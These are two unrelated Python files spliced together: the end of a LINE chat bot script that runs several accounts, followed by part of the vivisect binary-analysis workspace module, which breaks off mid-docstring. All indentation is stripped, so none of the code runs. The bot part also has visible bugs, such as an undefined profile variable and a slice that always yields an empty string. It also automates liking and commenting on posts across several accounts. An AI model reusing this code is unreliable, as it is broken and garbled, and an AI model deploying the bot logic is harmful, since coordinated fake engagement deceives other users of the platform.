_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin added")
except:
pass
print "[Command]Admin add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "@admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Admin remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin deleted")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["@list admin","@adminlist"]:
if msg.from_ in owner:
if admin == []:
cl.sendText(msg.to,"The admin list is empty")
else:
cl.sendText(msg.to,"Admin List")
mc = ""
for mi_d in admin:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Adminlist executed"
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
#wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5a)
profile6 = ka.getProfile()
profile6.displayName = wait["cName6"]
ka.updateProfile(profile6)
profile7 = kb.getProfile()
profile7.displayName = wait["cName7"]
kb.updateProfile(profile7)
profile8 = ko.getProfile()
profile8.displayName = wait["cName8"]
ko.updateProfile(profile8)
profile9 = ke.getProfile()
profile9.displayName = wait["cName9"]
ke.updateProfile(profile9)
profile10 = ku.getProfile()
profile10.displayName = wait["cName10"]
ku.updateProfile(profile10)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
for zx in range(0, 20):
hasil = cl.activity(limit=1000)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"@ZSI_TEAM")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(500)
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
__init__.py
|
"""
Yay! It's NOT IDA!!!1!!1!one!
"""
import os
import re
import sys
import time
import string
import hashlib
import logging
import binascii
import itertools
import traceback
import threading
import contextlib
import collections
try:
import Queue
except ModuleNotFoundError:
import queue as Queue
# The envi imports...
import envi
import envi.bits as e_bits
import envi.memory as e_mem
import envi.common as e_common
import envi.config as e_config
import envi.bytesig as e_bytesig
import envi.symstore.resolver as e_resolv
import envi.symstore.symcache as e_symcache
import vstruct
import vstruct.cparse as vs_cparse
import vstruct.primitives as vs_prims
import vivisect.base as viv_base
import vivisect.parsers as viv_parsers
import vivisect.codegraph as viv_codegraph
import vivisect.impemu.lookup as viv_imp_lookup
from vivisect.exc import *
from vivisect.const import *
from vivisect.defconfig import *
import vivisect.analysis.generic.emucode as v_emucode
logger = logging.getLogger(__name__)
STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER)
def guid(size=16):
return binascii.hexlify(os.urandom(size))
class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore):
'''
VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace
as their first parameter, and the workspace is responsible for all the user facing functions
of getters/adders, running analysis passes, making the various locations, loading files, and
more.
Current keyword arguments:
* confdir:
* Type: String (path to directory)
* Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory
* Default: $HOME/.viv/
* autosave (boolean):
* Type: Boolean
* Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them.
* Default: False
'''
def __init__(self, **kwargs):
e_mem.MemoryObject.__init__(self)
viv_base.VivWorkspaceCore.__init__(self)
autosave = kwargs.get('autosave', False)
cfgdir = kwargs.get('confdir', None)
if cfgdir:
self.vivhome = os.path.abspath(cfgdir)
else:
self.vivhome = e_config.gethomedir(".viv", makedir=autosave)
self._viv_gui = None # If a gui is running, he will put a ref here...
self.saved = True # TODO: where is this used?
self.rchan = None
self.server = None
self.chanids = itertools.count()
self.arch = None # The placeholder for the Envi architecture module
self.psize = None # Used so much, optimization is appropriate
cfgpath = os.path.join(self.vivhome, 'viv.json')
self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave)
# Ideally, *none* of these are modified except by _handleFOO funcs...
self.segments = []
self.exports = []
self.imports = []
self.codeblocks = []
self.relocations = []
self._dead_data = []
self.iscode = {}
self.xrefs = []
self.xrefs_by_to = {}
self.xrefs_by_from = {}
# XXX - make config option
self.greedycode = 0
self.metadata = {}
self.comments = {} # Comment by VA.
self.symhints = {}
self.filemeta = {} # Metadata Dicts stored by filename
self.transmeta = {} # Metadata that is *not* saved/evented
self.cfctx = viv_base.VivCodeFlowContext(self)
self.va_by_name = {}
self.name_by_va = {}
self.codeblocks_by_funcva = {}
self.exports_by_va = {}
self.colormaps = {}
self.vasetdefs = {}
self.vasets = {}
self.reloc_by_va = {}
self.func_args = {}
self.funcmeta = {} # Function metadata stored in the workspace
self.frefs = {}
# Extended analysis modules
self.amods = {}
self.amodlist = []
# Extended *function* analysis modules
self.fmods = {}
self.fmodlist = []
self.chan_lookup = {}
self.nextchanid = 1
self._cached_emus = {}
# The function entry signature decision tree
# FIXME add to export
self.sigtree = e_bytesig.SignatureTree()
self.siglist = []
self._initEventHandlers()
# Some core meta types that exist
self.setMeta('NoReturnApis', {})
self.setMeta('SymbolikImportEmulation', None)
# Default to basic file storage
self.setMeta("StorageModule", "vivisect.storage.basicfile")
# There are a few default va sets for use in analysis
self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),))
self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),))
self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING)))
self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING)))
self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER)))
self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER)))
self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), ))
self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX)))
self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),))
self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),))
def vprint(self, msg):
logger.info(msg)
def getVivGui(self):
'''
Return a reference to the vivisect GUI object for this workspace. If
the GUI is not running (aka, the workspace is being used programatically)
this routine returns None.
Example:
vwgui = vw.getVivGui()
if vwgui:
vwgui.doStuffAndThings()
'''
return self._viv_gui
def getVivGuid(self):
'''
Return the GUID for this workspace. Every newly created VivWorkspace
should have a unique GUID, for identifying a particular workspace for
a given binary/process-space versus another created at a different
time. Filesystem-copies of the same workspace will have the same GUID
by design. This easily allows for workspace-specific GUI layouts as
well as comparisons of Server-based workspaces to the original file-
based workspace used to store to the server.
'''
vivGuid = self.getMeta('GUID')
if vivGuid is None:
vivGuid = guid()
self.setMeta('GUID', vivGuid)
return vivGuid
def loadWorkspace(self, wsname):
mname = self.getMeta("StorageModule")
mod = self.loadModule(mname)
mod.loadWorkspace(self, wsname)
self.setMeta("StorageName", wsname)
# The event list thusfar came *only* from the load...
self._createSaveMark()
# Snapin our analysis modules
self._snapInAnalysisModules()
def addFref(self, fva, va, idx, val):
"""
Add a reference from the operand at virtual address 'va'
index 'idx' to a function local offset. Positive values
(beginning with 0) are considered argument references. Negative
values are considered function local storage and are relative to
the stack pointer at function entry.
"""
# FIXME this should probably be an argument
r = (va, idx, val)
self._fireEvent(VWE_ADDFREF, r)
def getFref(self, va, idx):
"""
Get back the fref value (or None) for the given operand index
from the instruction at va.
"""
return self.frefs.get((va, idx))
def getEmulator(self, logwrite=False, logread=False):
"""
Get an instance of a WorkspaceEmulator for this workspace.
Use logread/logwrite to enable memory access tracking.
"""
plat = self.getMeta('Platform')
arch = self.getMeta('Architecture')
eclass = viv_imp_lookup.workspace_emus.get((plat, arch))
if eclass is None:
eclass = viv_imp_lookup.workspace_emus.get(arch)
if eclass is None:
raise Exception("WorkspaceEmulation not supported on %s yet!" % arch)
emu = eclass(self, logwrite=logwrite, logread=logread)
emu.setEndian(self.getEndian())
return emu
def getCachedEmu(self, emuname):
"""
Get a cached emulator by name. If one doesn't exist it is
created and then cached.
"""
emu = self._cached_emus.get(emuname)
if emu is None:
emu = self.getEmulator()
self._cached_emus[emuname] = emu
return emu
def addLibraryDependancy(self, libname):
"""
Add a *normalized* library name to the import search
chain for this binary. This is only needed for formats
whose imports don't explicitly state their library name.
"""
# FIXME this needs to be event enabled... either plumb it special,
# or allow the get/append/set race...
dl = self.getMeta("DepLibs", None)
if dl is None:
dl = []
dl.append(libname)
self.setMeta("DepLibs", dl)
def getLibraryDependancies(self):
'''
Retrieve the list of *normalized* library dependancies.
'''
dl = self.getMeta("DepLibs", None)
if dl is None:
return []
return list(dl)
def setComment(self, va, comment, check=False):
'''
Set the humon readable comment for a given virtual.
Comments will be displayed by the code renderer, and
are an important part of this balanced breakfast.
Example:
vw.setComment(callva, "This actually calls FOO...")
'''
if check and self.comments.get(va):
return
self._fireEvent(VWE_COMMENT, (va, comment))
def getComment(self, va):
'''
Returns the comment string (or None) for a given
virtual address.
Example:
cmnt = vw.getComment(va)
print('COMMENT: %s' % cmnt)
'''
return self.comments.get(va)
def getComments(self):
'''
Retrieve all the comments in the viv workspace as
(va, cmnt) tuples.
Example:
for va,cmnt in vw.getComments():
print('Comment at 0x%.8x: %s' % (va, cmnt))
'''
return self.comments.items()
def addRelocation(self, va, rtype, data=None):
"""
Add a relocation entry for tracking.
Expects data to have whatever is necessary for the reloc type. eg. addend
"""
# split "current" va into fname and offset. future relocations will want to base all va's from an image base
mmva, mmsz, mmperm, fname = self.getMemoryMap(va) # FIXME: getFileByVa does not obey file defs
imgbase = self.getFileMeta(fname, 'imagebase')
offset = va - imgbase
self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data))
def getRelocations(self):
"""
Get the current list of relocation entries.
"""
return self.relocations
def getRelocation(self, va):
"""
Return the type of relocation at the specified
VA or None if there isn't a relocation entry for
the address.
"""
return self.reloc_by_va.get(va)
def pointerString(self, va):
return self.arch.pointerString(va)
def getAnalysisModuleNames(self):
return list(self.amodlist)
def getFuncAnalysisModuleNames(self):
return list(self.fmodlist)
def addFunctionSignatureBytes(self, bytez, mask=None):
"""
Add a function signature entry by bytes. This is mostly used by
file parsers/loaders to manually tell the workspace about known
entry signature types.
see envi.bytesig for details.
"""
self.sigtree.addSignature(bytez, mask)
self.siglist.append((bytez, mask))
def isFunctionSignature(self, va):
"""
Check if the specified va is a function entry signature
according to the current entry point signature tree...
"""
if not self.isValidPointer(va):
return False
offset, bytes = self.getByteDef(va)
return self.sigtree.isSignature(bytes, offset=offset)
def addNoReturnVa(self, va):
noretva = self.getMeta('NoReturnApisVa', {})
noretva[va] = True
self.cfctx.addNoReturnAddr(va)
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApi(self, funcname):
"""
Inform vivisect code-flow disassembly that any call target
which matches the specified name ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
"""
funcname = funcname.lower()
m = self.getMeta('NoReturnApis', {})
m[funcname] = True
self.setMeta('NoReturnApis', m)
noretva = self.getMeta('NoReturnApisVa', {})
# If we already have an import entry, we need to update codeflow
for lva, lsize, ltype, linfo in self.getImports():
if linfo.lower() != funcname:
continue
self.cfctx.addNoReturnAddr(lva)
noretva[lva] = True
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApiRegex(self, funcre):
'''
Inform vivisect code-flow disassembly that any call target
which matches the specified regex ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
'''
c = re.compile(funcre, re.IGNORECASE)
m = self.getMeta('NoReturnApisRegex', [])
m.append(funcre)
self.setMeta('NoReturnApisRegex', m)
for lva, lsize, ltype, linfo in self.getImports():
if c.match(linfo):
self.addNoReturnApi(linfo)
def isNoReturnVa(self, va):
'''
Check if a VA is a no return API
'''
return self.getMeta('NoReturnApisVa', {}).get(va, False)
def checkNoRetApi(self, apiname, va):
'''
Called as new APIs (thunks) are discovered, checks to see
if they wrap a NoReturnApi. Updates if it is a no ret API thunk
'''
noretva = self.getMeta('NoReturnApisVa', {})
for funcre in self.getMeta('NoReturnApisRegex', []):
c = re.compile(funcre, re.IGNORECASE)
if c.match(apiname):
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
for funcname in self.getMeta('NoReturnApis', {}).keys():
if funcname.lower() == apiname.lower():
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
def addAnalysisModule(self, modname):
"""
Add an analysis module by python import path
"""
if modname in self.amods:
return
mod = self.loadModule(modname)
self.amods[modname] = mod
self.amodlist.append(modname)
logger.debug('Adding Analysis Module: %s', modname)
def delAnalysisModule(self, modname):
"""
Remove an analysis module from the list used during analysis()
"""
if modname not in self.amods:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
x = self.amods.pop(modname, None)
if x is not None:
self.amodlist.remove(modname)
def loadModule(self, modname):
__import__(modname)
return sys.modules[modname]
def addFuncAnalysisModule(self, modname):
"""
Snap in a per-function analysis module (by name) which
will be triggered during the creation of a new function
(makeFunction).
"""
if modname in self.fmods:
return
mod = self.loadModule(modname)
self.fmods[modname] = mod
self.fmodlist.append(modname)
logger.debug('Adding Function Analysis Module: %s', modname)
def delFuncAnalysisModule(self, modname):
'''
Remove a currently registered function analysis module.
Example:
vw.delFuncAnalysisModule('mypkg.mymod')
'''
x = self.fmods.pop(modname, None)
if x is None:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
self.fmodlist.remove(modname)
def createEventChannel(self):
chanid = self.chanids.next()
self.chan_lookup[chanid] = Queue.Queue()
return chanid
def importWorkspace(self, wsevents):
"""
Import and initialize data from the given vivisect workspace
export.
"""
# During import, if we have a server, be sure not to notify
# the server about the events he just gave us...
local = False
if self.server is not None:
local = True
# Process the events from the import data...
fe = self._fireEvent
for event, einfo in wsevents:
fe(event, einfo, local=local)
return
def exportWorkspace(self):
'''
Return the (probably big) list of events which define this
workspace.
'''
return self._event_list
def exportWorkspaceChanges(self):
'''
Export the list of events which have been applied to the
workspace since the last save.
'''
return self._event_list[self._event_saved:]
def initWorkspaceClient(self, remotevw):
"""
Initialize this workspace as a workspace
client to the given (potentially cobra remote)
workspace object.
"""
uname = e_config.getusername()
self.server = remotevw
self.rchan = remotevw.createEventChannel()
self.server.vprint('%s connecting...' % uname)
wsevents = self.server.exportWorkspace()
self.importWorkspace(wsevents)
self.server.vprint('%s connection complete!' % uname)
thr = threading.Thread(target=self._clientThread)
thr.setDaemon(True)
thr.start()
def _clientThread(self):
"""
The thread that monitors events on a server to stay
in sync.
"""
if self.server is None:
raise Exception("_clientThread() with no server?!?!")
while self.server is not None:
event, einfo = self.server.waitForEvent(self.rchan)
self._fireEvent(event, einfo, local=True)
def waitForEvent(self, chanid, timeout=None):
"""
Return an event,eventinfo tuple.
"""
q = self.chan_lookup.get(chanid)
if q is None:
raise Exception("Invalid Channel")
return q.get(timeout=timeout)
def deleteEventChannel(self, chanid):
"""
Remove a previously allocated event channel from
the workspace.
"""
self.chan_lookup.pop(chanid)
def reprPointer(vw, va):
"""
Do your best to create a humon readable name for the
value of this pointer.
note: This differs from parent function from envi.cli:
* Locations database is checked
* Strings are returned, not named (partially)
* <function> + 0x<offset> is returned if inside a function
* <filename> + 0x<offset> is returned instead of loc_#####
"""
if va == 0:
return "NULL"
loc = vw.getLocation(va)
if loc is not None:
locva, locsz, lt, ltinfo = loc
if lt in (LOC_STRING, LOC_UNI):
return vw.reprVa(locva)
mbase, msize, mperm, mfile = vw.getMemoryMap(va)
ret = mfile + " + 0x%x" % (va - mbase)
sym = vw.getName(va, smart=True)
if sym is not None:
ret = sym
return ret
def reprVa(self, va):
"""
A quick way for scripts to get a string for a given virtual address.
"""
loc = self.getLocation(va)
if loc is not None:
return self.reprLocation(loc)
return "None"
def reprLocation(self, loctup):
if loctup is None:
return 'no loc info'
lva,lsize,ltype,tinfo = loctup
if ltype == LOC_OP:
op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK)
return repr(op)
elif ltype == LOC_STRING:
return repr(self.readMemory(lva, lsize))
elif ltype == LOC_UNI:
#FIXME super ghetto "simple" unicode handling for now
bytes = self.readMemory(lva, lsize)
return "u'%s'" % string.join(bytes.split("\x00"),sep="")
elif ltype == LOC_STRUCT:
lstruct = self.getStructure(lva, tinfo)
return repr(lstruct)
elif ltype == LOC_NUMBER:
value = self.parseNumber(lva, lsize)
hexstr = "0x%%.%dx" % lsize
hexstr = hexstr % value
if lsize == 1:
return "BYTE: %d (%s)" % (value, hexstr)
else:
return "%d BYTES: %d (%s)" % (lsize, value, hexstr)
elif ltype == LOC_IMPORT:
return "IMPORT: %s" % tinfo
elif ltype == LOC_POINTER:
return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO])
else:
n = self.getName(lva)
if n is not None:
return n
return binascii.hexlify(self.readMemory(lva, lsize))
def followPointer(self, va):
"""
Do pointer analysis and folllow up the recomendation
by creating locations etc...
"""
ltype = self.analyzePointer(va)
if ltype is None:
return False
# Note, we only implement the types possibly
# returned from analyzePointer...
if ltype == LOC_OP:
# NOTE: currently analyzePointer returns LOC_OP
# based on function entries, lets make a func too...
logger.debug('discovered new function (followPointer(0x%x))', va)
self.makeFunction(va)
return True
elif ltype == LOC_STRING:
self.makeString(va)
return True
elif ltype == LOC_UNI:
self.makeUnicode(va)
return True
return False
def processEntryPoints(self):
'''
Roll through EntryPoints and make them into functions (if not already)
'''
for eva in self.getEntryPoints():
if self.isFunction(eva):
continue
if not self.probeMemory(eva, 1, e_mem.MM_EXEC):
continue
self.makeFunction(eva)
def analyze(self):
"""
Call this to ask any available analysis modules
to do their thing...
"""
self.vprint('Beginning analysis...')
starttime = time.time()
# Now lets engage any analysis modules. If any modules return
# true, they managed to change things and we should run again...
for mname in self.amodlist:
mod = self.amods.get(mname)
self.vprint("Extended Analysis: %s" % mod.__name__)
try:
mod.analyze(self)
except Exception as e:
self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e))
endtime = time.time()
self.vprint('...analysis complete! (%d sec)' % (endtime-starttime))
self.printDiscoveredStats()
self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime))
def analyzeFunction(self, fva):
for fmname in self.fmodlist:
fmod = self.fmods.get(fmname)
try:
fmod.analyzeFunction(self, fva)
except Exception as e:
self.vprint("Function Analysis Exception for 0x%x %s: %s" % (fva, fmod.__name__, e))
self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc())
def getStats(self):
stats = {
'functions': len(self.funcmeta),
'relocations': len(self.relocations),
}
return stats
def printDiscoveredStats(self):
(disc,
undisc,
numXrefs,
numLocs,
numFuncs,
numBlocks,
numOps,
numUnis,
numStrings,
numNumbers,
numPointers,
numVtables) = self.getDiscoveredInfo()
self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (disc*100.0/(disc+undisc), disc, disc+undisc))
self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs))
self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables))
def getDiscoveredInfo(self):
"""
Returns tuple of ( bytes_with_locations, bytes_without_locations ) for all executable maps.
"""
disc = 0
undisc = 0
for mva, msz, mperms, mname in self.getMemoryMaps():
if not self.isExecutable(mva):
continue
off = 0
while off < msz:
loc = self.getLocation(mva+off)
if loc is None:
off += 1
undisc += 1
else:
off += loc[L_SIZE]
disc += loc[L_SIZE]
numXrefs = len(self.getXrefs())
numLocs = len(self.getLocations())
numFuncs = len(self.getFunctions())
numBlocks = len(self.getCodeBlocks())
numOps = len(self.getLocations(LOC_OP))
numUnis = len(self.getLocations(LOC_UNI))
numStrings = len(self.getLocations(LOC_STRING))
numNumbers = len(self.getLocations(LOC_NUMBER))
numPointers = len(self.getLocations(LOC_POINTER))
numVtables = len(self.getLocations(LOC_VFTABLE))
return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables
def getImports(self):
"""
Return a list of imports in location tuple format.
"""
return self.getLocations(LOC_IMPORT)
def makeImport(self, va, libname, impname):
"""
Add an import entry.
"""
if libname != '*':
libname = self.normFileName(libname)
tinfo = "%s.%s" % (libname, impname)
self.makeName(va, "%s_%.8x" % (tinfo, va))
return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo)
def getExports(self):
"""
Return a list of exports in (va,etype,name,filename) tuples.
"""
return list(self.exports)
def addExport(self, va, etype, name, filename, makeuniq=False):
"""
Add an already created export object.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
"""
rname = "%s.%s" % (filename,name)
# check if it exists and is *not* what we're trying to make it
curval = self.vaByName(rname)
if curval is not None and curval != va and not makeuniq:
# if we don't force it to make a uniq name, bail
raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval))
rname = self.makeName(va, rname, makeuniq=makeuniq)
self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename))
def getExport(self, va):
"""
Get a reference to the export object at the given va
(or none).
"""
return self.exports_by_va.get(va)
def findPointers(self, cache=True):
"""
Search through all currently "undefined" space and see
if you can find pointers there... Returns a list of tuples
where the tuple is (<ptr at>,<pts to>).
"""
align = self.arch.archGetPointerAlignment()
if cache:
ret = self.getTransMeta('findPointers')
if ret is not None:
# Filter locations added since last run...
ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)]
self.setTransMeta('findPointers', ret)
return ret
ret = []
size = self.psize
for mva, msize, mperm, mname in self.getMemoryMaps():
offset, bytes = self.getByteDef(mva)
maxsize = len(bytes) - size
# if our memory map is not starting off aligned appropriately
if offset % align:
offset &= -align
offset += align
while offset + size < maxsize:
va = mva + offset
loctup = self.getLocation(va)
if loctup is not None:
offset += loctup[L_SIZE]
if offset % align:
offset += align
offset &= -align
continue
x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
if self.isValidPointer(x):
ret.append((va, x))
offset += size
continue
offset += align
offset &= -align
if cache:
self.setTransMeta('findPointers', ret)
return ret
def detectString(self, va):
'''
If the address appears to be the start of a string, then
return the string length in bytes, else return -1.
'''
plen = 0 # pascal string length
dlen = 0 # delphi string length
if self.isReadable(va-4):
plen = self.readMemValue(va - 2, 2) # pascal string length
dlen = self.readMemValue(va - 4, 4) # delphi string length
offset, bytez = self.getByteDef(va)
maxlen = len(bytez) - offset
count = 0
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if count > 0:
loc = self.getLocation(va+count)
if loc is not None:
if loc[L_LTYPE] == LOC_STRING:
if loc[L_VA] == va:
return loc[L_SIZE]
if ord(bytez[offset+count]) != 0:
# we probably hit a case where the string at the lower va is
# technically the start of the full string, but the binary does
# some optimizations and just ref's inside the full string to save
# some space
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c = bytez[offset+count]
# The "strings" algo basically says 4 or more...
if ord(c) == 0 and count >= 4:
return count
elif ord(c) == 0 and (count == dlen or count == plen):
return count
if c not in string.printable:
return -1
count += 1
return -1
def isProbablyString(self, va):
if self.detectString(va) > 0 :
return True
return False
def detectUnicode(self, va):
'''
If the address appears to be the start of a unicode string, then
return the string length in bytes, else return -1.
This will return true if the memory location is likely
*simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>).
'''
# FIXME this does not detect Unicode...
offset, bytes = self.getByteDef(va)
maxlen = len(bytes) - offset
count = 0
if maxlen < 2:
return -1
charset = bytes[offset + 1]
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if (count > 0):
loc = self.getLocation(va+count)
if loc:
if loc[L_LTYPE] == LOC_UNI:
if loc[L_VA] == va:
return loc[L_SIZE]
if ord(bytes[offset+count]) != 0:
# same thing as in the string case, a binary can ref into a string
# only part of the full string.
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c0 = bytes[offset+count]
if offset+count+1 >= len(bytes):
return -1
c1 = bytes[offset+count+1]
# If we find our null terminator after more
# than 4 chars, we're probably a real string
if ord(c0) == 0:
if count > 8:
return count
return -1
# If the first byte char isn't printable, then
# we're probably not a real "simple" ascii string
if c0 not in string.printable:
return -1
# If it's not null,char,null,char then it's
# not simple unicode...
if c1 != charset:
return -1
count += 2
return -1
def isProbablyUnicode(self, va):
if self.detectUnicode(va) > 0 :
return True
return False
def isProbablyCode(self, va, rerun=False):
"""
Most of the time, absolute pointers which point to code
point to the function entry, so test it for the sig.
"""
if not self.isExecutable(va):
return False
ret = self.isFunctionSignature(va)
if ret:
return ret
if va in self.iscode and not rerun:
return self.iscode[va]
self.iscode[va] = True
emu = self.getEmulator()
emu.setMeta('silent', True)
wat = v_emucode.watcher(self, va)
emu.setEmulationMonitor(wat)
try:
emu.runFunction(va, maxhit=1)
except Exception as e:
self.iscode[va] = False
return False
if wat.looksgood():
self.iscode[va] = True
else:
self.iscode[va] = False
return self.iscode[va]
#################################################################
#
# Opcode API
#
def parseOpcode(self, va, arch=envi.ARCH_DEFAULT):
'''
Parse an opcode from the specified virtual address.
Example: op = m.parseOpcode(0x7c773803)
note: differs from the IMemory interface by checking loclist
'''
off, b = self.getByteDef(va)
if arch == envi.ARCH_DEFAULT:
loctup = self.getLocation(va)
# XXX - in the case where we've set a location on what should be an
# opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param
# so that at least parse opcode wont fail
if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP:
arch = loctup[L_TINFO]
return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False):
if not step:
step = self.psize
fname = self.getMemoryMap(startva)
if fname is None:
return
fname = fname[3]
imgbase = self.getFileMeta(fname, 'imagebase')
iters = 0
ptrbase = startva
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
while self.isValidPointer(rdest) and self.isProbablyCode(rdest):
if self.analyzePointer(ptrbase) in STOP_LOCS:
break
yield rdest
ptrbase += step
if len(self.getXrefsTo(ptrbase)):
break
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
iters += 1
if maxiters is not None and iters >= maxiters:
break
def moveCodeBlock(self, cbva, newfva):
cb = self.getCodeBlock(cbva)
if cb is None:
return
if cb[CB_FUNCVA] == newfva:
return
self.delCodeBlock(cb)
self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva))
def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4):
'''
So we have the case where if we have two jump tables laid out consecutively in memory (let's
